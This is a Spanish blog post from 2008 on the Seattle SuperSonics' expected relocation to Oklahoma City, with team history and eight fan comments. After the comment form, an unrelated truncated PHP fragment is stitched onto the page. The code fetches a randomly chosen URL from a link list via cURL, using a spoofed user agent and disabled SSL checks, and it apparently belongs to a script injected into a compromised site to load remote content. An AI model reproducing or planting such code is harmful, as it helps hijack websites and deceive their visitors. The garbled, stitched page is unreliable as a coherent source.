Últimos días de una franquicia histórica

25 de March de 2008 por MagicJohnson32

seattlelogosonics Para muchos de nosotros, Seattle siempre ha sido y será la ciudad de la música Grunge, Frasier Crane y los Sonics. El grunge nació y murió en la década de los ’90, pese a que Pearl Jam siguen dando lecciones de rock aun hoy y Seattle aún produce grupos maravillosos como Band of Horses. La gran telecomedia “Frasier” se despidió de sus muchos millones de espectadores en mayo de 2004 tras once temporadas en antena, y todavía echamos de menos al psicólogo radiofónico y su hermano Niles. Así que ya sólo nos quedan los Sonics.

dennisjohnsonicsPero por poco tiempo. Como se venía rumoreando desde tiempo atrás, el propietario de la franquicia, Clay Bennett, ha mostrado su voluntad de abandonar la ciudad. No sólo eso: en su marcha (posiblemente a Oklahoma City) dejará atrás el nombre, colores y demás rasgos identificativos de los Sonics. Será, en caso de consumarse el traslado, el adiós definitivo a 40 años de historia en verde y amarillo, un inmerecidamente triste adiós para un equipo que nos deja recuerdos imborrables, especialmente los de aquel equipo de la temporada 95-96, conocidos como Sonic Boom y que, de la mano de Gary Payton y Shawn Kemp, y conpaytonkempduo fabulosos secundarios como Detlef Schrempf, Nate McMillan, Hersey Hawkins o Sam Perkins, fue capaz de alcanzar la final y ganar dos partidos a los Bulls.

Más lejos nos quedan los días del Anillo de 1979, el único en la historia de los SuperSonics, cuando Dennis Johnson (MVP de aquellas Finales) y Gus Williams vengaron la derrota del año anterior y vencieron a los Washington Bullets por 4-1.

Lenny Wilkens, Ray Allen, Xavier McDaniel, Spencer Haywood, Dale Ellis, Tom Chambers, Fred Brown, Jack Sikma, Pau Silas, Rashard Lewis… son algunos de los nombres que han contribuido a hacer de los Sonics una franquicia histórica y de Seattle un lugar reconocible en el imaginario colectivo de todos los aficionados al baloncesto. Una franquicia que no merece el bochornoso espectáculo que el equipo está ofreciendo esta temporada (17 victorias en 71 partidos y cosas como el reciente 116-168 encajado ante los Nuggets).

Gracias por los recuerdos:

Comenta

8 comentarios a esta entrada

  1. Dantley dice:
    #1

    Qué pena ¡¡¡ Al final si esto se ha concretado, la verdad es que perdemos un clásico. Oklahoma ha demostrado más ganas de tener NBA, pero no deja de ser triste.

    … siempre nos quedan los Seattle Rays …

      Citar

  2. MagicJohnson32 dice:
    #2

    Lo que a mí me parece bien es que cambien el nombre y los colores. Los Sonics siempre serán Seattle.

      Citar

  3. MagicJohnson32 dice:
    #3

    Ah, bueno, y lo mejor, que no lo he dicho, es que si Seattle volviese a tener una franquicia, podría recuperar el nombre y demás, todo salvo jugadores y cuerpo técnico.

      Citar

  4. Dantley dice:
    #4

    ¿Sí? Pues razón de más para que en Oklahoma le cambien el nombre. Para muchos los Lakers siempre serán Minneapolis ¡¡¡

    También se hablaba de problemas en Sacramento y posible mudanza a Las Vegas. Aunque parece que se enfrió. El que sí creo que estaba confirmado es el de los Nets a Brooklyn. Aunque en este caso, por distancia realmente es lo mismo y en New York puede tener mejor pinta la franquicia.

      Citar

  5. Jabho dice:
    #5

    Curioso y raro. Como ciudad potencialmente es mas ciudad Seattle que Oklahoma ¿no? Mas grande y mas activa económicamente creo. Por tanto mas mercado…

    Una pena. Y como dices la despdida este año lamentable aunque se veia venir.

      Citar

  6. MagicJohnson32 dice:
    #6

    ¡¡¡Y un huevo, Jose, y un huevo!!!

    😀

    Minneapolis son lagos y Prince.

      Citar

  7. Gallis dice:
    #7

    Jose, por menos se ha baneado a gente…y si no se ha hecho, deberíamos comenzar esa tradición contigo, jeje…

    Pues ya lo escribí en su momento. Para mí es una noticia terrible. Es un histórico y lo echaré de menos.

      Citar

  8. Dantley dice:
    #8

    Ah, cierto, Minneapolis es Prince, entonces rectifico, jeje

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>